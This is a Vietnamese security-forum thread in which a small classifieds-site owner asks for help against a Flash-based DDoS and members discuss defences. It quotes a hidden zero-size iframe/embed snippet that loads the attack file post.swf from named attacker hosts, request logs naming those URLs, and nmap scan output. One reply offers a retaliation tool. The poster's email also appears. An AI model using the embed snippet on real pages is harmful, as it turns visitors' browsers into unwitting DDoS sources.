Website đang bị Ddos mong các bạn giúp đỡ

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận bảo mật

Website đang bị Ddos mong các bạn giúp đỡ

[Question] Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 00:42:43 (+0700) \| #1 \| 107558

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Website của mình nội dung chỉ là trang mua bán rao vặt ở một tỉnh lẻ,không biết vì lý do gì mà từ lúc up lên host tới giờ (chưa được 15 ngày) bị ddos liên tục,họ dùng X-Flash tấn công làm server treo luôn.Bên cho thuê host của Nhân Hòa khi website mình bị tấn công thì họ suspended website của mình.

Bên Nhân Hòa có hỏi mình "Anh có thù oán gì với ai không mà trong vòng 15 ngày hôm nay họ liên tục nhắm vào site anh".Mình nghe mà không biết giải thích thế nào.Một người ở tỉnh lẻ như mình(môi trường làm việc,tiếp xúc bên ngoài để học hỏi) có giỏi đến đâu thì cũng có giới hạn so với các bạn ở nơi khác làm sao có thể gây thù oán với ai cho được.Có thù oán thì chỉ thù oán với Nhân Hòa thôi chứ thù oán với mình làm gì.

Thôi đó chỉ là chuyện phụ,bạn nào có cách nào chỉ giúp mình hạn chế tình trạng này,mình sợ ddos đến mức không dám ghi site mình lên đây.

YM !: ducnam_dt_th
Email : ngdcnam@gmail.com

Mong các bạn giúp đỡ,cảm ơn nhiều.

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 02:04:54 (+0700) \| #2 \| 107571

MrMe
Elite Member

Joined: 08/07/2006 13:01:01
Messages: 150
Offline

Cậu phải cho mọi người thông tin chứ.
Chẳng hạn dùng shared host hay dedicate server. Tên web hoặc web viết = ngôn ngữ gì chứ..................
Nói như thế ai giúp được bạn smilie

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 02:40:30 (+0700) \| #3 \| 107579

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Cảm ơn bạn đã quan tâm đến câu hỏi của mình.

Mình dùng gói shared hosting của Nhân Hòa,code web là PHP.

Địa điểm xuất phát ban đầu mấy ngày trước ở đây: http://icolaippolyte.co.uk/
sau đó lan sang nhiều client khác cùng tấn công
Họ dùng file flash có tên là post.swf
Sau đó lại chuyển hướng qua host miến phí khác,bây giờ vẫn chưa xác định được(host mình bị đóng rồi chưa liên hệ để mở được)

Mong các bạn giúp đỡ.

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 05:11:02 (+0700) \| #4 \| 107593

MrMe
Elite Member

Joined: 08/07/2006 13:01:01
Messages: 150
Offline

Câu hỏi của bạn có nhiều rồi mà . Bạn tìm đọc lại các bài viết trước đi nha
/hvaonline/posts/list/13996.html

Với shared host thì thật sự khó. Chỉ còn cách đặt pass khi vào site bằng file .htaccess và viết đoạn code giới hạn số connection từ 1 IP trong 1 khoảng thời gian thôi

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 05:28:06 (+0700) \| #5 \| 107595

nguoididingoaipho
Member

Joined: 10/12/2007 00:44:11
Messages: 90
Offline

MrMe wrote:

Với shared host thì thật sự khó. Chỉ còn cách đặt pass khi vào site bằng file .htaccess và viết đoạn code giới hạn số connection từ 1 IP trong 1 khoảng thời gian thôi

Chỉ nhằm chống DoS lên database thôi. Còn nó đập mạnh thì nguyên server ngủ lun nếu ko có firewall chặn từ ngoài

Công Lý là diễn viên hài bỏ vợ

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 06:02:35 (+0700) \| #6 \| 107596

MrMe
Elite Member

Joined: 08/07/2006 13:01:01
Messages: 150
Offline

nguoididingoaipho wrote:

Chỉ nhằm chống DoS lên database thôi. Còn nó đập mạnh thì nguyên server ngủ lun nếu ko có firewall chặn từ ngoài

Thế mới có câu

MrMe wrote:

Với shared host thì thật sự khó.

stop here

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 06:47:48 (+0700) \| #7 \| 107598

HkDng
Elite Member

Joined: 30/10/2003 05:04:09
Messages: 236
Location: Bộ ... phận ...
Offline

Bạn dùng shared host của Nhân Hòa thì bắt thằng Nhân Hòa chống, chứ bạn làm sao chống được?

Nếu Nhân Hòa treo host của bạn thì nên hủy hợp đồng với nó rồi chuyển sang thuê host khác thì hơn.

___________________
Just around the corner!

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 07:04:48 (+0700) \| #8 \| 107601

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Không biết ý của bạn mình làm với Nhân Hòa được không,họ bảo chỉ có cách tạo user và pass khi có ai truy cập vào website.Website này chỉ phục vụ cho cộng đồng nhỏ,mà đâu phải cho những ngừoi làm IT như ở website này đâu.Khi thấy cửa sổ nhập user và pass chắc họ tắt chứ không thèm vào.

[Question] Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 07:06:30 (+0700) \| #9 \| 107602

onlinehack
Member

Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline

vanhung123 wrote:

Website của mình nội dung chỉ là trang mua bán rao vặt ở một tỉnh lẻ,không biết vì lý do gì mà từ lúc up lên host tới giờ (chưa được 15 ngày) bị ddos liên tục,họ dùng X-Flash tấn công làm server treo luôn.Bên cho thuê host của Nhân Hòa khi website mình bị tấn công thì họ suspended website của mình.

Bên Nhân Hòa có hỏi mình "Anh có thù oán gì với ai không mà trong vòng 15 ngày hôm nay họ liên tục nhắm vào site anh".Mình nghe mà không biết giải thích thế nào.Một người ở tỉnh lẻ như mình(môi trường làm việc,tiếp xúc bên ngoài để học hỏi) có giỏi đến đâu thì cũng có giới hạn so với các bạn ở nơi khác làm sao có thể gây thù oán với ai cho được.Có thù oán thì chỉ thù oán với Nhân Hòa thôi chứ thù oán với mình làm gì.

Thôi đó chỉ là chuyện phụ,bạn nào có cách nào chỉ giúp mình hạn chế tình trạng này,mình sợ ddos đến mức không dám ghi site mình lên đây.

YM !: ducnam_dt_th
Email : ngdcnam@gmail.com

Mong các bạn giúp đỡ,cảm ơn nhiều.

Có đôi lời mạn bàn với bạn smilie

Trong trường hợp của bạn, về mặt kĩ thuật, khả năng đối phó là không thể smilie

Nhưng trong trường hợp thế này, bạn nên suy nghĩ rộng hơn về mặt xã hội.
Nếu Website của bạn là làm kinh tế, và có đủ khả năng, bạn nên bỏ khoảng 100$ 1 tháng thuê server để manage tốt hơn
Còn nếu thiệt hại kinh tế do site bị suspend là nhỏ, thì bạn có thể cho nó tạm dừng hoạt động một thời gian rồi trở lại hoạt động bình thường.
Đơn giản thế này, nếu bạn đang có một cọc giấy, nhưng có một thằng nhóc cứ thích chọc phá để lấy của bạn , mà bạn không thể đánh nó ( vì nó là em bạn chẳng hạn ) thì bạn làm gì? Nếu là mình, mình sẽ cho nó cả xấp , cho nó chơi chán thì thôi smilie

và lúc đó bạn rảnh tay làm việc khác .

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 07:22:43 (+0700) \| #10 \| 107607

paint my love
Member

Joined: 28/12/2007 18:16:08
Messages: 2
Offline

web site của bạn là gì thế, việc gì phải sợ nhân hòa đạt rack ở FPT rồi bán lại cho mọi người ,bạn có thể yêu cầu nhân hòa cung cấp log file, xem ai ddos bạn mà trả đũa ,kêu cứu thì ai giúp phải đánh lại chúng nó ngay nếu bạn thích tôi sẽ cung cấp cho bạn cộng cụ đánh trả với 1 điều kiện nho nhỏ ,nhân hòa đã từng bị ddos rất nặng phải nhờ tới phòng cảnh sát phòng chống tội phạm công nghệ cao bắt giữ thủ phạm thì mới hết,nếu ai đó fake IP nhiều lớp mà ddos bạn thì phát hiện sẽ rất khó ...................

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	02/01/2008 10:36:25 (+0700) \| #11 \| 107640

oak
Member

Joined: 18/04/2006 09:54:00
Messages: 85
Location: Somewhere
Offline

bó tay với ông paint my love.NGười ta chỉ hỏi cách phòng chống mà ông lại định cung cấp kit để người ta tấn công lại.Thứ nhất về mặt pháp lý ông đánh lại nó là ông cũng bị tùng xẻo.Thứ hai ông định nhắm mục tiêu vào đâu, vào cái mạng bot net mà hắn đang dùng hả.Thứ ba chả có ai đủ tự tin làm một trận dos x-flash mà lại không biết fake ip cho ra hồn cả.
Tôi cho rằng cách của ông hackonline là khả thi nhất, Dù sao thì DOS vẫn là con quái thú khó trị,nhất là ở điều kiện host như của bạn.Thân

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 07:22:43 (+0700) \| #12 \| 108139

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Các bạn có thể giúp mình tìm dùm trang web nào đặt các file flash này,theo mình biết có thể trang web đặt file flash này có số lượng người truy cập rất lớn.
Họ có thể dùng cách này để ddos,mình đoán thế nhưng không dám chắc lắm.

<body>
<IFRAME src="http://cquelineavies.co.uk/tangmaythu8com/adm/post.swf" width=0 height=0></IFRAME>
</body>

hoặc

<embed src="http://cquelineavies.co.uk/tangmaythu8com/adm/post.swf" width=0 height=0>

Có thể họ đặt những đoạn trên vào 1 website có người truy cập rất lớn.

Mình đưa thông tin requests vào site mình cho các bạn coi:

requests: 1116719 ; url: http://icolaippolyte.co.uk/music/login/post.swf
requests: 1072290 ; url: http://cquelineavies.co.uk/tangmaythu8com/adm/post.swf
requests: 546843 ; url: http://cquelineavies.co.uk/tangmaythu8com/DVDVIP/adm/post.swf
......

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 09:26:21 (+0700) \| #13 \| 108165

oak
Member

Joined: 18/04/2006 09:54:00
Messages: 85
Location: Somewhere
Offline

Với thông tin bạn đưa ra tui chỉ mò được vào cái host chứa file flash đang nhấp nháy attacking.Ra ngoài hơn một chút thì nhân được câu cảnh báo của tác giả vụ dos trên cả hai host.
Cấu hình của cả hai máy server ở 2 host tương đối giống nhau.Tất cả các port đều được đóng kín trừ cổng 80.Sử dụng apache , máy chủ sử dụng linux(fedora thì phải)=> tên này chắc cũng thuộc loại chắc tay.
"For OSScan assuming port 80 is open, tcp/22 and udp/34459 are closed, and neither are firewalled"-> câu này đáng để ý.
Cấu hình máy:Embedded Linux 2.4.17 - 2.4.18 (AVM Fritz!Box SL 5010 or Speedport W 501 V; D-Link DSL-504T or DSL-G604T; Netgear DG834 or DG834G; Ovislink AirLive; Planet WAP-1963A; or Linksys PAP2 VoIP apapter) (94%), QLogic SANbox2-8 FC switch or Sharp Zaurus PDA (Linux 2.4.18) (93%), Linux 2.4.18 - 2.4.32 (93%), Linux 2.4.28 - 2.4.30 (93%), Linux 2.4.21 - 2.4.33 (92%), Linksys WRT54GS WAP (Linux kernel) (91%), WebVOIZE 120 IP phone (91%), Linux 2.4.31 w/grsec (x86) (91%), Linux 2.4.32 (x86) (91%), Linux 2.4.31 (Slackware v10.2) (90%)
Không làm được gì hơn rất tiếc.

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 11:53:44 (+0700) \| #14 \| 108204

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Cảm ơn bạn oak nhiều lắm vì những thông tin giúp đỡ rất quí giá,nó sẽ giúp ích cho mình sau này, các url này bên cho thuê host họ đã ban IP này từ lúc bắt đầu site bị ddos, họ không thể ddos trực tiếp vào site được.
Trước mắt mình muốn biết họ dùng cách nào để phát tán đến các client (chủ yếu là IP động) trong khả năng của mình chỉ dự đoán họ chèn các url trên vào các tag với những website có lượng người truy cập rất lớn.Từ những đường dẫn "/music/" hay "tangmaythu8com/DVDVIP/" mình đoán có thể nó nằm trên một trang web nghe nhạc hay một trang sex nào đó,thường thì web này đã mã hóa và cấm chuột phải.
Dải IP 123 đầu chiếm tỉ lệ request đến site nhiều nhất
222.253 thứ 2
118 thứ 3
222.254 thứ 4

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 12:09:58 (+0700) \| #15 \| 108210

FaL
Moderator

Joined: 14/04/2006 09:31:18
Messages: 1232
Offline

Xin phép nhắc nhở bạn oak chỉnh lại bài viết cho phù hợp.

Thank oak for editing... smilie

Hãy giữ một trái tim nóng và một cái đầu lạnh

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 13:46:50 (+0700) \| #16 \| 108249

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

oak wrote:

Cấu hình của cả hai máy server ở 2 host tương đối giống nhau.Tất cả các port đều được đóng kín trừ cổng 80.Sử dụng apache , máy chủ sử dụng linux(fedora thì phải)=> tên này chắc cũng thuộc loại chắc tay.
"For OSScan assuming port 80 is open, tcp/22 and udp/34459 are closed, and neither are firewalled"-> câu này đáng để ý.
Cấu hình máy:Embedded Linux 2.4.17 - 2.4.18 (AVM Fritz!Box SL 5010 or Speedport W 501 V; D-Link DSL-504T or DSL-G604T; Netgear DG834 or DG834G; Ovislink AirLive; Planet WAP-1963A; or Linksys PAP2 VoIP apapter) (94%), QLogic SANbox2-8 FC switch or Sharp Zaurus PDA (Linux 2.4.18) (93%), Linux 2.4.18 - 2.4.32 (93%), Linux 2.4.28 - 2.4.30 (93%), Linux 2.4.21 - 2.4.33 (92%), Linksys WRT54GS WAP (Linux kernel) (91%), WebVOIZE 120 IP phone (91%), Linux 2.4.31 w/grsec (x86) (91%), Linux 2.4.32 (x86) (91%), Linux 2.4.31 (Slackware v10.2) (90%)
Không làm được gì hơn rất tiếc.

Làm thế nào để có được những thông tin này vậy bạn,các công cụ whois hay domaintools nào chăng?

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 14:27:25 (+0700) \| #17 \| 108272

ThíchHắcKinh
Member

Joined: 05/11/2007 21:56:23
Messages: 85
Location: Thiếu Lâm Tự
Offline

Mới decompile thằng post.swf này ra thử ... thấy ngay cái tên nghe quen quen hình như là "Dinhcaohack" gì đó ... Xem ra có người khoái viết mấy cái vớ vẩn này rồi quănq bậy bạ để người khác dùng hại người quá nhỉ. Đúng là mấy cu rãnh hơi .. Chưa đi đêm chưa biết lạnh.

Decompile thằng post này thấy nó lấy thông tin từ đây file ddos.txt

cụ thể: http://icolaippolyte.co.uk/music/login/ddos.txt

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	04/01/2008 22:07:33 (+0700) \| #18 \| 108300

vanhung123
Member

Joined: 01/01/2008 10:34:06
Messages: 6
Offline

Địa chỉ http://icolaippolyte.co.uk/music/login/post.swf vào ngày 21-12-2007 họ dùng để tấn công site của mình.Hiện giờ họ dùng để tấn công site khác.Mình đã gọi điện thoại báo cho người quản trị trang này cách đây 3 ngày.

Vào đêm 31-12-2008 họ dùng địa chỉ http://cquelineavies.co.uk/tangmaythu8com/adm/post.swf này bắt đầu tấn công vào site mình.Có điều lạ là mặc dù mình đã dùng 2 bản Flash player v 9.0.115.0 dùng cho 2 trình duyệt FF và IE vẫn không có tác dụng với file .swf này.

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	07/01/2008 07:45:48 (+0700) \| #19 \| 108806

subnetwork
Member

Joined: 05/09/2004 06:08:09
Messages: 1666
Offline

oak wrote:

Với thông tin bạn đưa ra tui chỉ mò được vào cái host chứa file flash đang nhấp nháy attacking.Ra ngoài hơn một chút thì nhân được câu cảnh báo của tác giả vụ dos trên cả hai host.
Cấu hình của cả hai máy server ở 2 host tương đối giống nhau.Tất cả các port đều được đóng kín trừ cổng 80.Sử dụng apache , máy chủ sử dụng linux(fedora thì phải)=> tên này chắc cũng thuộc loại chắc tay.
"For OSScan assuming port 80 is open, tcp/22 and udp/34459 are closed, and neither are firewalled"-> câu này đáng để ý.

Distro Fedora không chắc lắm đâu ! Nếu chọn dùng các "dòng giống" Redhat nên dùng Centos thì thích hợp hơn so với Fedora vì phiên bản distro linux Fedora không được ổn định .

oak wrote:

Cấu hình máy:Embedded Linux 2.4.17 - 2.4.18 (AVM Fritz!Box SL 5010 or Speedport W 501 V; D-Link DSL-504T or DSL-G604T; Netgear DG834 or DG834G; Ovislink AirLive; Planet WAP-1963A; or Linksys PAP2 VoIP apapter) (94%), QLogic SANbox2-8 FC switch or Sharp Zaurus PDA (Linux 2.4.18) (93%), Linux 2.4.18 - 2.4.32 (93%), Linux 2.4.28 - 2.4.30 (93%), Linux 2.4.21 - 2.4.33 (92%), Linksys WRT54GS WAP (Linux kernel) (91%), WebVOIZE 120 IP phone (91%), Linux 2.4.31 w/grsec (x86) (91%), Linux 2.4.32 (x86) (91%), Linux 2.4.31 (Slackware v10.2) (90%)
Không làm được gì hơn rất tiếc.

Nhìn nguyên 1 đống thông tin mà bro đưa lên, sao toàn có 2.4 sao không upgrade kernel 2.6 luôn đi vì phiên bản kernel của bro rất củ , cứ patch hoài không chán lắm sao smilie

Quản lý máy chủ, cài đặt, tư vấn, thiết kế, bảo mật hệ thống máy chủ dùng *nix
http://chamsocmaychu.com

[Question] Re: Website đang bị Ddos mong các bạn giúp đỡ	07/01/2008 12:37:25 (+0700) \| #20 \| 108852

MrMe
Elite Member

Joined: 08/07/2006 13:01:01
Messages: 150
Offline

Golden Autumn wrote:

Nhìn nguyên 1 đống thông tin mà bro đưa lên, sao toàn có 2.4 sao không upgrade kernel 2.6 luôn đi vì phiên bản kernel của bro rất củ , cứ patch hoài không chán lắm sao

ó đây là bác oak scan được mà chứ có phải server của bác oak đâu.
Bác nhầm lẫn hay sao đó smilie

Go to:

Users currently in here
1 Anonymous